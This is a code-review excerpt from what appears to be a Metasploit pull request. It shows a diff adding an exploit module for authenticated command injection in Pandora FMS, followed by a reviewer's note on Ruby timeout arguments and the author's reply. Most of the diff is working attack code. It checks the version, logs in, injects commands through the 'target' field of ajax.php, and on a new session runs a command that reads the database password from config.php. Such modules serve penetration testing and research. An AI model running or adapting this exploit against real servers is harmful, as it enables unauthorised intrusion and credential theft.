modules/exploits/linux/http/pandora_fms_events_exec.rb

```diff
@@ -0,0 +1,185 @@
+    end
+
+    @cookie = res.get_cookies
+    html = res.get_html_document
+    full_version = html.at('div[@id="ver_num"]').text
+
+    unless full_version && (!full_version.to_s.eql? '')
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    version = full_version[1..-1].gsub!('NG', '')
+
+    unless version && (!version.to_s.eql? '')
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    version = Gem::Version.new version
+
+    unless version <= Gem::Version.new('7.0.744')
+      return CheckCode::Safe("Target is Pandora FMS with version #{full_version}.")
+    end
+
+    CheckCode::Appears("Target is Pandora FMS with version #{full_version}.")
+  end
+
+  def login(user, pass)
+    vprint_status "Authenticating as #{user} ..."
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'cookie' => @cookie,
+      'vars_get' => { 'login' => '1' },
+      'vars_post' => {
+        'nick' => user,
+        'pass' => pass,
+        'login_button' => 'Login'
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 302
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    redirect = res.headers['Location']
+
+    unless redirect && redirect.to_s != ''
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => redirect,
+      'cookie' => @cookie
+    })
+
+    unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good "Authenticated as user #{user}."
+  end
+
+  def on_new_session(client)
+    super
+    print_status('Trying to read the MySQL DB password via `cat include/config.php | grep dbpass`. The default privileged user is `root`.')
+    command = 'cat include/config.php | grep dbpass'
+    client.shell_write(command + "\n")
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status('Executing payload...')
+    referer_url = normalize_uri(target_uri.path, 'index.php', '?sec=eventos&sec2=operation/events/events')
+    data = 'page=include/ajax/events&perform_event_response=10000000'
+    data << "&target=#{cmd}"
+    data << '&response_id=1'
+
+    # using a raw request to prevent the post data from being encoded, which would prevent exploitation
+    send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ajax.php'),
+      'cookie' => @cookie,
+      'headers' => {
+        'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}",
+        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8'
+      },
+      'data' => data
+    }, timeout = 0.1) # the server will not send a response, so the module shouldn't wait for one
```

Comment:
```suggestion
    }, 0) # the server will not send a response, so the module shouldn't wait for one
```

Couple of notes here. In Ruby, keywords arguments are specified like `foo: 0` and arguments that use `=` are always positional, so using `timeout =` here only sets a variable in this module and doesn't change this method call. Also, if we expect no response, I think we can use a timeout `0`, but you should probably test that.

Reply:
Thanks for the info @acammack-r7! I actually copied this from an existing module and used it because it did prevent the module from waiting for a response. I've changed this now though, after testing that it works.